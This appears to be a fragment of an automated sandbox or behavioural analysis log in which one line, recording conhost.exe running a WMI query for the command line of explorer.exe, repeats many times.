Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
